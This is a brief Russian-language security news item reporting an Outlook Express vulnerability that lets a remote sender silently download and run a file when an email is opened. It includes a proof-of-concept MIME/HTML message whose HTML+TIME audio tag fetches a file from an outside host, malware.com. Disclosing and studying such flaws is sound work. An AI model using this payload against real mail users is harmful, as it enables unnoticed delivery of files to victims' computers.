Уязвимость обнаружена в Microsoft Outlook Express.
Удаленный атакующий может незаметно
загрузить и выполнить произвольный файл на
компьютере адресата в обход любых
ограничений безопасности в Outlook Express.

Сообщается, что следующий код загрузит
произвольный файл при открытии почтового
сообщения, в установках по умолчанию Outlook
Express: RESTRICTED ZONE:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03  http://www..malware.com

<html xmlns:t>
<head><style> t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf"  />
</body></html>

При этом никакие предупреждения
пользователь не получит.

Рабочий пример

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии